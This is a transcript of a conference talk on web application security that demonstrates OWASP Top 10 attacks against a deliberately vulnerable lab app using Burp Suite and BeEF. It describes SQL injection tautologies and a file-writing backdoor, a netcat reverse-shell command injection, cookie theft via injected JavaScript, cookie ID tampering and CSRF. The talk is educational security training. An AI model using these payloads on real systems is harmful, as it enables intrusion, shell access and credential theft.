Cool. Well, hello everybody. My name is Chad Furman. I am a full-stack web developer / tech lead / security person / only developer on my project. I love it very much. If you're curious about what it's like to work from the comfort of your living room, working with the latest technologies in web application development, definitely check out hire.clevertech.biz. I'm just a developer there, but I like the company, and I think you would too. So, that said, today, we are going to not be talking about building websites, but breaking them. And why breaking them is good, why it works, why it's fun, and why you should do it if you own the website. So we're going to start talking about a group of people who really like breaking and fixing websites, the Open Web Application Security Project. Now, you may or may not know this, but there was a conference that just kind of ended. Oh. Microphone. Should I just hold it?
If you want it, whatever.
Well then, let's do that. How about now? Ooh, wow, there we go. Hello. Okay, well, I guess we'll back up. Try this one more time. So, Chad Furman, web application developer, clever tech, lots of fun, work from home, latest web technologies, JavaScript, lots of cool stuff. Highly recommend. Open Web Application Security Project. These guys are really dedicated, and they are actually all of us, right? Anyone can join and participate in this group. You can go to chapters, get memberships, and all that great stuff. They just did a conference where they revised a whole bunch of old projects for the latest vulnerabilities and all of that great stuff, and we'll talk about a couple of them, but primarily the things that you should really know about when we're talking about Owasp are the top 10, which we'll get to in a second, proactive controls, and specifically application security verification standard. These are kind of like guides that you can use to help you avoid a lot of the problems associated with vulnerable web applications. Other things that can really be helpful in finding the vulnerabilities are like dependency check, which looks for vulnerabilities in your libraries and such, and ZAP, Z-Attack Proxy. We're going to be using Burp Suite, but ZAP is by Owasp. It's another similar tool. So lots of great stuff with Owasp. Check out their website, owasp.org. Lots of good stuff there. So when we talk about a vulnerable web application, the only reason web applications are vulnerable are because they are dynamic and they take in user input, and they don't treat that user input with the appropriate degree of scrutiny. When we talk about dynamic applications, we're talking about PHP, Ruby, JavaScript, anything that can basically take in a script and execute it. And we're not just talking about HTML and CSS, although once you get user input into the mix, even those can be a little bit dangerous. People do this for a variety of reasons, this being make bad user input to hack websites. But for the most part, we do it because we're trying to generate value for our clients. We want to know, how can we keep our businesses, our clients, our projects safe? How can we keep them secure? And how can we really make them successful? And I kind of borrowed that line from this gentleman, Robert Hurlbert, from the Amherst Security Meetup, which if you're ever in Massachusetts, I highly recommend. Before we talk about breaking websites, just some things that you should really know if you want to kind of be safe on the internet and avoid what we're really going to talk about. Just some things that you can really keep in mind. But for the most part, the guides that I mentioned, the Application Security Verification Standard, there's other ones online like Fallible Inc., Security Checklist, good practices, right? Obviously sanitize your input going into your database and make sure that you don't display untrusted input without filtering it. All that general stuff. Keep up on your training. Keep learning. Everyone here is awesome, right? Because we need a safer internet if we're going to really be successful as, well, on many levels. So, speaking of a safer internet, when you actually want to test the security of some component, you're going to kind of go through a certain set of goals, right? The first goal is to really map out your target. You're going to do that with a set of tools ranging from kind of looking at the data that's available to actively getting in there, right? So phase one, you're just going to kind of survey the land set. Where are the servers, right? What are the applications available? All of that stuff. And we're going to do that a little bit. Scanning automated tools can really help you find some vulnerabilities. But at the end of the day, you're going to have to get access to the data. And we're not going to talk too much about maintaining access or covering our tracks, but we will show some examples of breaking websites to get at their data. Using these. These are the top 10. So I hope it's not too small. I know the fate of programmers is to suffer eyesight issues, but I think that we can all read this. The general idea is that there's 10 issues ranked in order of commonality, and it changes. And we'll go through the variations really quick, but in general, you've got injection attacks, which allow people to inject code, commands, get them to run. Everything from database commands to operating system commands. Cross-site scripting is kind of a form of injection, but not really, right? You've got JavaScript that you are injecting onto the page of the user that then runs and does a number of things, which we will talk about. Broken auth. It's kind of confusing when we get to some of the other items, but broken auth specifically is about your identity and taking on the identity of other people in ways the application didn't expect you to. Insecure direct object references, that's like you've got a backup file, something like that, in your public HTML directory. People download it, they have your entire code. Cross-site request forgery, you're just kind of making an action on somebody else's website from your own website on behalf of the user who came to your website and was logged in over there. Don't worry too much about it. We'll talk about that. Misconfiguration, I mean, I don't want to spend a lot of time on these, but I'm going to go through them once because we're going to go through them a lot in detail. So let's keep going. Security misconfiguration is changed a couple of times, but in general, it's, there's error messages, things being exposed on the server, ports open, vulnerable applications that have been upgraded. I can talk. Cryptographic storage. So, don't store your passwords in plain text. Credit card information, it's not in plain text, right? And if you jump ahead really quick, A9 is the in transit. So there's the at rest and in transit from 2010. Failure to restrict URL access is kind of more commonly referred to now as function level access control, but the general idea is you can access a URL as a not authenticated user that allows you to do privileged activities. And unvalidated redirects and forwards may seem harmless, but they can allow you to do social engineering that can result in backdoors on people's computers, as well as many other things like trigger your XSS attacks and stuff. So in 2013, it changed very slightly. The general idea is that all the things are still kind of the same, but sensitive data exposure, right? That's kind of now a combination of at-rest and in-transit crypto. Missing function level access control, like I said, expanded. Components with known vulnerabilities was explicitly extracted from security misconfigurations because people do that. Update your stuff. 2017, there's a draft in place. They're still kind of working on it. The points that we're going to touch on are taken from the 2013 because this isn't finalized. But in general, they added the idea of automatic monitoring web application firewalls. As well as really making sure that your APIs are protected because APIs tend to be very vulnerable. So before we get into the code and stuff, let's take a look at Burp Suite. This is the tool that we're going to be using. So Burp Suite is a proxy tool that we can use to really intercept our traffic in transit and monitor it and manipulate it for goals. So the idea here, right, is you start out, I happen to know that my target is 10.0.2.4. So I'm going to add that target to scope. Yes, I don't want any other data. I'm going to make sure that I show only in-scope items. And there we go. So my proxy is already on. We have a little checkbox here. We've got the information already configured in my web browser, so all of my Firefox traffic is going to go through Burp Suite, and we will see what that looks like. In the process of doing that, we will build out a sitemap, which will give us some more information. This is the reconnaissance stage. We're trying to really get a feel for what pages exist, what endpoints exist, what things we can really play around with. So in doing that, we would then go, if you're running an automated scan, you've got the scanner tab, which kind of benefits from the spider. It'll spider the entire website and kind of scan it as it goes. There's the intruder tab, which allows us to really target specific fields with things like brute force or dictionary attacks, including URL fields if you're looking for common files or directories. You have the repeater, which of course allows you to repeat a request. Now this is extremely powerful because you can also duplicate the request in your browser and really build out your cross-site request forgery tools kind of with just the access of a right-click button. So you've got some stuff here too that we'll get into. So the sequencer is good for kind of like decrypting your session tokens and things like that if they're not actually random. Decoder is good for switching between base 64, hex, ASCII, whatever you need. This is if you have two giant blocks of text and you're sure that they're different, but you're not quite sure how. This can help you figure it out. It's a compare. And of course, Burp is extremely extensible. The entire API is documented. If you want to write, you can write in Ruby, you can write in Python. There's a whole bunch of apps that already exist. So that's kind of Burp Suite in a high-level overview. So let's keep going because we've still got a lot to cover. But before I dive into actually doing this stuff, let's take a moment and just kind of see a show of hands. How many people here write code? Okay, cool. How many people here specifically work on websites? Awesome. Okay, so I will go into some of the basics a little bit. We've kind of got maybe I'd say an eighth of the room that's really comfortable with web application development, which is fine. So the idea here is when you want to do a search or when you want to log in, you send data via an HTTP request that results in a variable being constructed on the server that contains your data. From there, that variable can be used to construct commands. One of the most common commands, of course, is select something where something is equal to something. So in this case, it's select user where password is equal to whatever password they've entered. Now, of course, I don't recommend that. Passwords should be hashed. You should hash the password, compare the hashes. But this is a vulnerable example. So you can go beyond that. But before we do, let's take a look at what this might look like. So I have my little cheat sheet here because I will fat finger it otherwise. Copy this. And by the way, my cheat sheet and my slides are available online. So if we go to, by the way, this Mutilidae application that we're using in the background, I believe was originally created by Iron Geek. Right, we've got his reference information here. So thank you for that. So let's take a look at the user info data extraction page. So here, right, the idea is if we had an account, we could log in, we could see our data. And for the sake of consistency, let's do that. So our name is cat, our password is equally secure dog, and frogs. Okay, so now we have a user. It's going to display. Sure, remember my password. I will forget that. And let's back up because the menus. So we've got cat and dog. And if we log in, we can see it, right? So there's my signature and all that great stuff. Well, this is select from database where user equals cat and password equals dog. Well, if we change this to be single quote space or equals one space hyphen hyphen space, right? Syntax is important. if we do that, what we will have in the end is something that looks like this. Select, where user equals and password equals. Now note, there's two quotes next to each other. That is key. What we are doing is we are terminating the field, and then we are adding on an additional SQL command that is a tautology. It is always true. When password is blank or true, which is true. And because of that, we're able to get the results that you will see in a second. Take careful note, there is a space after the hyphen hyphen. The hyphen hyphen is a comment. It says everything that would come after this line, if we're in the middle of a query, just ignore it. We just don't care. It's a comment, right? That way we can add our code and not care about anything else that follows. So when we do this, doesn't really matter, let's see, what the password is, we get everyone. Because we have where value is blank or true, which is always true. So we get everything. Now, interestingly enough, and this will lead very nicely into broken auth, right? We have the admin password. Admin user is the first user in your database. You don't want to do this. It's very common, and because it's so common, we can do things where logging in with an injection attack, that is a tautology, will result in the first user that it finds being who we log in as. Any guesses who that is? So now we are site admin. Okay, but let's pause there because I could just keep going and I will, but let's review for a moment. So we had a simple query, simple injection, right? We'll come back to this in a second, but the idea here is there are more complicated injection attacks. And what you're ultimately going to want to do is either create a shell with select into out file and then accessing that out file, which we might have time for. Or you do a union statement with an additional select. Now, if you do a union statement with an additional select, and this is probably the slide I'm going to spend the most time on, by the way. If you do a union statement with a select, the fields have to match. The number of fields have to match. So you do that by adding in null, comma, null, etc., until the error state on the page switches to the success state, at which point you know that you have the correct number of fields. Then you successively replace each null with A in single quotes until you find a field that displays a string somewhere on the page. At which point, when you have that field, you can select a concatenated statement of values from any table. So you can pull out all of the columns in a single record for any table, including the information schema in MySQL, which contains information about tables, databases, right? So you can get a list of all of the schema information in the database and then pull out whatever you want. There's actually a tool that'll do this for you called SQL Map. If you use SQL Map and you point it at a vulnerable endpoint, you run a command, it will not only dump the database schema, but dump the entire contents of the database. And you just kind of let it go. So yeah. Just a side note, insert injections are different from select injections. The classic example of little Bobby tables, right? The XKCD comic where the mom's like, gets a call, did you really name your kid Robert? Drop table students. It's like, yeah, and I hope you learn to escape your user input. But the thing is, right, in MySQL, you can't just put a semicolon and then build more commands on top of it, which is why this particular attack won't work in that scenario with MySQL database. What you can do is select with string concatenation or insert with string concatenation and then successively hexify and decimalify 8-character chunks of the data that you want. So in that way, you can still painfully extract whatever data you need from the database with insert injections. So that's something interesting to look into. But we did a demo of SQL injection. It was very basic, and we might have time to come back and do some of the more fun stuff. But before we continue, let's talk about command injection. So in general, it's very similar. The command here is to execute a logging statement that just logs whatever event's being submitted by the user. But if the user submits && command, it's going to be Unix command concatenation, right? So then it's going to run both commands. And in this case, what we do is we first start out with netcat. How many people here know what netcat is? Yeah, if you don't know what netcat is, it's a cool tool that allows you to basically send whatever data you want over the wire. You can actually even use the -e flag to get whatever data coming back and pipe it into another program, like bash, for like a really nice remote access Trojan. Because nc-l-p means listen locally on port 5000, and then you inject the command to connect to my server on port 5000, and everything that we get, just send it into bash. Let's take a look at what that looks like. I like this one. So here we're going to do nc-l-p 5000. It's going to list, and we're going to queue up a command. So when this gentleman here connects for us, we will see. So we want command injection. And it's just going to be, so if we just do, just do Google. Right, what happens if we just type in Google without anything else? It's going to run, it's going to spit out some data. So then likewise, if we were to type in &echo, right, let's see, what do we get? We get ASDF, right? So then if we were to do &nc 10.0.2.5 5000 -e, and come on, do it. Let that run for a sec. If we take a look here, we see that it executed our ls command. So what happened is we injected a connect back command. It connected to our server. It got the ls command from our waiting, listening netcat daemon, piped it to the server, and showed us the output. We actually have a running command here. So if we did ls/home, etc., etc., etc. So we have shell on the server as the user of the web application. Pat yourself on the back. That was fun. Moving on. Command injection, SQL injection. What else do we got? So, broken authentication session management. We all kind of saw us hack into a web application using SQL and becoming the admin. But what if we just kind of wanted to watch and see what happens when we connect as a regular user? So in this scenario, right, let's log out. And who are we? Cat dog? Cat dog. Sorry. Oh, am I blocking myself? So one of the things you have to watch for when you use Burp Suite is that it's very easy to leave your proxy interceptor on, and then all of your traffic just stops flowing. It's not on. Oh, because, and when you do penetration tests, be very careful not to do this in production. My command hung the entire server. It was no longer taking any requests because I had just a netcat daemon listening in its process, right? So I broke the web server. So don't do that to production. You have to be careful with this stuff and only do it on your own websites because it can have unintended consequences. Okay, so there we go. Back in, logging in. But before we do, let's actually turn on our interceptor and see what we get. So we've got cat and we've got dog. So in this case, right, it's going to immediately halt, and we're going to see, okay, we've got username equals cat, password equals dog, login page submit, button equals login, blah, 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 right? This is very basic, very simple. We're not horribly interested in this. Let's continue. So we forward that along. Oh, and we look, ooh, what's this? We get a response back that contains a cookie header. Username equals cat, UID equals 17. Okay, well, let's send this one to our repeater. Let's forward this one along. So this is the response. Actually, I'm wrong. We don't want the response. But what we do want are successive page requests that contain that cookie that we just got. So I turned my intercept off so we can see that request come through. Well, turn that back on. Save time. Refresh. Okay. So this time, this is us going to the server. We're sending the same request. This we are going to put it in a repeater. And we're going to change this UID, right? I mean, why not? There's no reason I can't change this UID. My favorite user to be is user number 1 because I'm important. So I'm going to say go. Okay, well, that's cute. It's in HTTP. Well, I don't want it in HTTP. I want it in my browser. So I'm going to copy that URL. I'm going to paste it into my proxied browser here. I'm going to make sure the intercept gets turned off so that I can actually succeed in life. And there we go. So it logged us in as the admin again, right? All we did was change our cookie parameter from UID 17 to UID 1, and we're logged in. Likewise, you could iterate through all of the IDs in the database. One of the reasons why universally unique identifiers are awesome, right? UUIDs, because they're non-sequential. So it's much harder to iterate over something that's not sequential. So it's really hard to guess what the admin user's ID would be. So, moving on. First foray into broken session authentication. How was it? Was it fun? Okay. So, one of the things that you can really do is add some secure flags to your cookies, right? So if it was HTTPS, it'd be a lot harder you could only get cookies over an HTTPS connection with a secure flag. So I couldn't sniff that and transit. I would actually have to be kind of on the site manipulating that data. And likewise, HTTP only. So we'll see in a second with JavaScript, you can access those cookies. HTTP only makes it so that you can only get them via an HTTP request. You can't get them on the page, enforced by browser policy. So let's talk about what that JavaScript is. So cross-site scripting attacks. Who here loves JavaScript? Yeah? I love JavaScript. I think it's awesome. It's super powerful. You can use it everywhere. You can do great things, make a lot of money. Great language. Highly recommended. One of the things you can do, and my code was actually a little bit cut off here, is you can create elements on the DOM, or the document object model. In this case, you can create an image tag. You can set its SRC attribute to be a domain that you control with a dynamic property set from document.cookie. So you get the session ID, you get the user ID, you get whatever you need to log into them sent to you because their page displayed them an image that doesn't exist. So we will do that. We're not going to do phishing and malware just because I don't really want to reconstruct the entire website in HTML, put it in this JavaScript tag, and then rewrite the document to whatever we want. But that's what you would do. You can do that to get people to in order to access our website at Comcast.com, you have to download our new Authenticator app, right? Whoops. Okay, cool. Backdoor. So you can also do router hacking. So if you visit a website with malicious JavaScript on it and your router version is vulnerable, that website connects to your router if you've saved your authentication or whatever, and then changes whatever it wants through cross-site request forgeries. It can set your DNS to be them, and then they man in the middle all of your traffic. So combinations of vulnerabilities can really escalate. Beef, and I'm a vegan, so browser exploitation framework Beef is a really powerful tool that I will recommend. So let's talk about JavaScript and what that looks like. We've got a little, reference here, pen test tool lookup. So we're going to go back to that page. Let's see. So, how am I on time? Doing good. Doing good. Okay. We want a really simple, really straightforward example here. Oh, I know a really good one. Log out. So we created an account as CatDog But dog cat is much more malicious. So dog cat is going to set his signature to this is classic XSS. This is called stored XSS. In this case, we're going to do document.cookie. Anybody think they know what this does? It will alert the cookie onto the screen. It will tell you what our authenticated cookie is every time you see that code. And you happen to see that code when you log in. So let's log in. Looks like I broke the site here. Yeah. Regular expression flag S. Interesting. It didn't like my alert. So, but as you can see, we have obviously injected code. Let's see if we can log out. Whatever. Good enough. Sure. So my JavaScript obviously needed a little bit of work there. Why don't I stick with the example that's actually in the slides and also demonstrate perhaps cross-site request forgery in the process. So this command here at the bottom looks kind of messy, right? We've got some single quotes, some braces, parentheses, or whatever. Why is it such a mess? Well, the reason is because that's how it has to be in order to get executed. Let's take a look at why. Callie. So we've got burp, and we've got our proxy on. Well, let's go back to pen testing tools. Look up here. Cross-site scripting. Okay, cool. So this request, if we were to intercept this request and do a search for Web Securify and forward, so then in HTTP history, we've got Web Securify here. The goal is to see our input show up on the page. So let's try again. Telephone. So rather than just let it go through, let's send it to the repeater. And let's say go. So we entered tool ID 1 and lookup tool, right? So we've got a whole bunch of stuff. So this is going to be slow going if we go this route, but if we send it to the intruder and we say in our positions, we've got position 1 and lookup tools, we don't care about the session ID or the page name at the moment, and we are going to do, I believe it's going to be cluster bomb attack. And in the payload positions, right, we have 2 payload positions. We're going to say a simple list. So the first one's going to be frog. And the second one, why don't I make that a lot easier? Cat. Dog. It's probably good to use like unique strings in all of the fields across the applications, not ones that match your username, but this is good enough for now. So we've got cat dog in position 1, and we've got frog in position 2. So then at this point, if we go to options and we say, okay, well, we want to make sure that we see any results that contain frog, cat, I don't know if that actually added, and dog. Okay. Now what? Well, now we start the attack. So in this case, the window pops up and it says, okay, I tried your list and the different payloads, and I actually found cat on all of the pages and dog in a couple of spots. So that's probably because my username is cat, right? So like I said, don't do that. That actually screwed us up in this situation. I'm going to go back to payload number 1, get rid of cat, only dog and frog. That's all I care about. So dog shows up on this page. So dog was payload 1, right? That was the ID of the tool that we were looking up. Programmer's like, oh, the ID, yeah, that's safe. Echo that out onto the page. What could possibly go wrong? Well, let's see, where is dog on this page? Shows up in the header. It's in the request. And then where is it in the response? Okay, so in the response, the ID entered into this crazy little blob of JavaScript. So that's where everything comes from. We're breaking out of this string, injecting a script tag, and then creating the string again. So that's why it's so messy. So let's go back to our repeater. Let's say, okay, well now I know that this little guy here, tool ID number 1, needs to be my JavaScript. So I need to get a URL safe version of my JavaScript. So I want to, okay, so I have to paste the code in first. I want to go to my cheat sheet and grab this guy down here. So in order for this to work, beef has to be running. Let's make sure beef is running. Okay, it's running, and then if we go to beef. Anybody ever heard of Bacon.js, by the way? Programmers and their meat products. Okay, so here we are. We're logged in, beef. So that's all interesting stuff. Well, what do we see? We see online browsers, offline browsers, nothing. Okay, well, let's continue. Let's go back to our web application over here. So this is kind of running and waiting for us to inject some data. So we've got our JavaScript that we want to inject. Let's take a look at it, right? So we end our current script tag. We load a script that includes our beef hook. And then we just start everything back up and just make stuff up. And so we copy that. And I actually have cat there twice, which I probably just don't want. So we're going to just make sure this is URL encoded, which it is. Come on, copy please. Paste that blob in there. Okay, let's request this gentleman in our web browser, if we can. And now, when we run this gentleman, repeat request. Okay, so it's being probably proxied. Come on. So it loads. Did our JavaScript execute? Yes. So now we have a browser hooked by beef. At that point in time, all bets are off, because you could do some crazy stuff with beef. And I'm not really going to go into it too much, but just the one that I talked about already. Hooked domains, get cookies, execute, command. Right, so there's my PHP session ID. There's my beef hook ID, right? So I stole the cookies with beef. So, XSS, powerhouse, really cool tool, meat flavored. So so the rest of this stuff is going to be relatively quick, I hope. I think I've got plenty of time and time for questions. Please hold questions in the back of your minds, take notes, don't lose them. Questions are great. Insecure direct object references. So in a way, us manipulating that user ID is a form of insecure direct object reference. The object happens to exist in the database. Other forms of direct object references, if you happen to put backups or if you do editing on your server, you have editor backups, right? If your config files aren't properly password protected, htaccess, and interestingly enough, temp, right? /temp. Is there a way for the user to access a file that they have been able to upload to the server? I'm going to mention /temp for a very specific reason. I'm going to have to put the microphone down for this one, I think. So, bear with me. Let's see what we got. The idea here is we're going to go back and revisit SQL injection really quick. We're going to take some of that fun SQL stuff that we skipped over, specifically backdoors, and let's see if I can find it. PHP, this one. So I happen to know that this one isn't going to work. So we are able to detect through certain error messages on the page that the path to the execution of these scripts is, /var www. So if that's my public HTML folder, I'm going to try to write to that first. I already know that's going to fail. I can't write to that folder. But I can write to backdoor.php. So again, let's review this really quick, right? We're breaking out of our SQL statement. There are 5 columns in this SQL statement originally, so we have 5 fields in our attack. One of those fields is a nested SQL statement that actually isn't displaying anything but selecting a set PHP string, a constant, into a specific file at a location that we know about. This attack relies on a couple of vulnerabilities in the application, not just one. It relies on direct object references through the URL, which I will show what that means. So we've got back to injection, we've got user info. Oh, I'm still logged in. Where's my incognito window? I don't know, just give me another one. Fine, utility, blah, blah, blah. User info, doesn't matter. Okay, so let's inject our command. Okay, bad username and password, sure. And now, just to make sure that we know what we're doing, let's try. Okay, that works. That shouldn't work, by the way. And then we've got temp backdoor.php, and I think it was C. Was it C? So it doesn't like that. Yeah, my command's wrong. What's our script? Command, not C. Alright, well, we're going to have to move on from that one, unfortunately. Why isn't that working? I don't know. But the general idea, and I bet you we can verify it if I go directly into the virtual machine itself. So backdoor.php gets uploaded to the server, and this should technically work, but I don't know why it's not. Oh, I know. No, I don't want to waste time on it. Moving forward. It's just an SQL injection attack that created a PHP file that technically we have access to. Wasn't able to show that we have access to it, but that PHP file will take whatever you put in the command line, execute it into shell on the server. Benefits of live demos. Moving on. Well, yeah, we touched on all of this. So, by the way, with Burp Intruder, you can actually set a list of common files and then set your injection parameter to be in the URL. And it can find some of this stuff for you. So security misconfiguration, outdated versions of software. This one's just going to be real quick. Let's take a look at Burp's headers for some of these requests. So we can see in the headers, down here, in the response headers, that the server is powered by, Apache 2.2.8, 5.2.4, PHP version. Are there any vulnerabilities for these things? So this is kind of a security misconfiguration in and of itself, that you're actually revealing sensitive data. This is definitely a form of sensitive data exposure. But if we do PHP 5.2.4 CVE, hopefully I'm connected to the internet, so on and so forth. So you can see that there are some very severe vulnerabilities in this version of PHP. Security misconfiguration confirmed. You can do an Nmap scan. You can see what ports exist. You want to make sure that the web server isn't actually running as a user that has access to other parts of the system. Ideally in some sort of a jail where they don't have commands like ls and that kind of stuff, because they don't need it because they're a web server user. That's all sensitive data. I'm sorry, security misconfiguration. Sensitive data exposure. So this is going to kind of get more into the fact that we could see the passwords on the page, right? When we actually did our SQL attack, we saw all the passwords in plain text. So if your passwords are unencrypted or any sort of data is unencrypted, if you have security keys or anything like that, they get added to your repo, and you think that you can just delete them and push again and they're gone, right? If it's still in your Git history, I mean, sensitive data exposure is in lots of places. But in general, make sure you know what data is sensitive and what data isn't. We've already kind of demonstrated this with the passwords being in plain text with our SQL injection. So I'm going to move ahead. Missing function level access control. Now this one's kind of cute in this use case because it's like very convoluted. But in general, if you have an API endpoint that can do something that only an admin user should be able to do, and anyone can do it, that's not good. So in this case, let's see. It's private browsing. So if we look, we're not logged in. If we look in this menu here down here, it says set up and reset the database. Disabled. It's not admin. I can't click on it. It's disabled in the user interface, right? Granted, they also happen to give us this beautiful reset DB button right at the top. I'm not logged in, but of course I can execute this page and wipe the entire database. Like I said, very convoluted. But specifically, this page is supposed to be restricted. Well, it's not this one anymore. But the page is supposed to be restricted to admin only, as the UI element indicated, but we were able to execute it without any trouble. And of course, in the modern day and age, that's like REST endpoints, right? How many people have built a REST API that had an endpoint that they knew wasn't protected, but it was obscure enough, so, nobody will ever find it. Yeah. I never do that, ever. Sometimes you inherit legacy code and stuff's just set up a certain way, and you have to find the vulnerabilities and then fix them. What else do we got? Almost done. You guys are doing great. Cross-site request forgery. This one's kind of fun. The only reason I like this one so much is because Burp Suite gives us a nice tool for really making it happen. I'm almost out of time, but this will be hopefully the last somewhat minute-wise, time-consuming adventure we do. So if we were to just say, for example, we wanted somebody else to trigger the reset database button for us. Say it's only available to admin users, and we need them to do it for our penetration test to be successful. So I should probably be careful with the microphone. Talk into the microphone. What do we got? Private browsing. And go. So we want the reset password button URL, and we want to catch it in Burp so that we can build a thing. Let's catch it in Burp. Oops, wrong one. Okay. Now in Burp, let's send it. Let's see. Send to repeater. Now in the repeater, there's a way, you might even be able to do this from the other window. Generate cross-site request forgery proof of concept. Okay? So if we do this with any request, what we're going to get is an HTML page that will allow us to basically execute the CSRF to demonstrate how it works. So if we copy this URL, of course, turn off our proxy. I'm almost out of time. You guys are awesome. I'm hopefully going to save time for questions. So if I click this button, right, it's going to trigger an action on the other website. That's the whole bread and butter of cross-site request forgery. And that action is to reset the database. So if I was logged in as the admin and this page wasn't protected by some sort of security token like a nonce that said the request originated from the original site, then this vulnerability would exist and the database would have been erased. Known vulnerable components, we did that one, right? PHP version was vulnerable. You can also find vulnerabilities in the frameworks that they're using to build stuff. And sometimes the servers themselves have like the critical vulnerabilities from before because they just have an upgrade and somebody forgot about the box in the corner. And it becomes a pivot. So the last one, and we're not really going to talk too much about this one. You're going to have to use your imagination. But the idea is that this URL has the endpoint after the redirect in it. The user can set the page that they're being redirected to once they visit the URL. Some people will just look and they'll see, oh, 10.0.2.4. Oh, that's my bank. Okay, I'm going to log in. Right? But it's even though it redirected them to a new website. The domain name changed. Everything looks the same because the hacker made it that way, but they can trick them into doing lots of different stuff. Oh, you guys are awesome. We made it all the way through. So let's see if there's any questions. Yes?
How would you conduct a web application pen test?
The question is, how would you conduct a web application pen test? So what I would start by doing is identifying as many of the components of the application as possible, right? Map it all out, get the server infrastructure down, write everything you know down to tech stack, detail all of the versions of things that you find down to the versions of the JS libraries that you can pull from comments in the headers. Get it all detailed as best as possible. Run an automated scan just to let it crawl the website, see what it can find for low-hanging fruit, and then go in and be like, okay, these pages have dynamic variables. I'm going to input unique strings into all of these different pages and all of these different fields, and then go through and map out where all of these fields display. And then I'm going to see if I can inject any of these individual fields to change the output on those pages. And from there, it's a matter of, making sure once you're in that you can stay in, that you can always get the access tokens and make sure that nobody can find you while you're inside. And at that point in time, you've successfully thwarted all attempts to protect that server and your penetration test has succeeded.
So if you have a web application, should you use a development application, not the production one, just in case you can break things?
Yes. Have a testing environment, have a sandbox environment that isn't production. Make sure that you limit so the question is, should you have a sandbox environment? Don't pen test your production servers, because you can break them. Yes, you should have a sandbox environment. Absolutely. Any other questions? Please don't be shy. I promise I don't bite. Yes?
How would you work with a developer to secure?
So I would say, so these are the things that I have found in my penetration test, right? So I am the developer. So what I have to do is I have to say, okay, these are the things that I know are bad, right? I know there's vulnerabilities that I've just had to kind of code around in order to meet business deadlines. And those are my high priority ones. These are the ones that I know are critical. They're there. They have to be fixed. Start there, get rid of them. Then the automated scan produces a result, right? Hit the high and medium level items in that scan to the best of your ability. And then go through things like the application security verification standard and find items that are applicable to your site and get them in your sprint with tickets and deadlines and somebody responsible for it. And at that point in time, you have progress. And it's kind of an ongoing thing, right? You're going to push new code, okay? Push new code goes through development, tests pass, gets to staging, QA hits it, they do some light security testing on it, bugs, goes back to development, right? Gets through security test pass, goes to prod. So it's a continuous ongoing thing. Here are our business priorities. Here is our sensitive data, mission critical stuff. Let's make sure that's as secure as we know how to make it first, and then move on to whatever else we know exists and hit the items in order of priority. Yes, sir?
So you showed Burp Suite and Beef. Are there any other tools that you like to use or recommend?
There are so many. There are so many. SQL map is really good. Depends on what you're trying to break into. If you're trying to specifically get into your own web application to really test its securities, there are, ZAP, Z-Attack Proxy is one. Owasp has other XSS hunting tools. Nessus and OpenVAS are automated infrastructure scanning tools. Nmap, just kind of see what's there. Maybe hit it with Armitage, just to see if Armitage can find anything. Hopefully it doesn't. That's like a Metasploit-powered thing. So use the tools at your disposal to the best of your abilities. But at some point, it's just going in and clicking on stuff. Yes? Are there any other penetration testing framework? So Kali is kind of an operating system that includes a lot of different tools. I use Kali because it has SQL map. It has the free version of Burp. It has a lot of things. It's got word lists. It's got password crackers. Right? It's all nice. You could take Ubuntu and throw in, I think it's called Backbuntu or Blackbox or something like that, just a set of repos that give you security tools at Ubuntu. So if you want to go that route, you can get NetHunter for your phone, which is Kali also, basically. But in general, these are just the tools. So if you have a set of security tools that you've fallen in love with for one reason or another, then you can just install them in whatever operating system you want. There's a lot of tools out there. Yes, sir?
Was that the free version that you were using?
So the free version, and I was using the professional version, but you're not really going to notice a difference for what we just did. The professional version gives you an automated scanner, which I didn't really go into, and it also gives you the some more extensions and some faster intruder iterations for brute forcing attacks. But for the most part, the free version is what you need. And Zap comes with an automated scanner and is 100% free. So the Z-Attack Proxy by Owasp. Highly recommend you check out the Owasp website. Are we done? One more question if we have time. Yeah, we have time, but no hands, so we're done.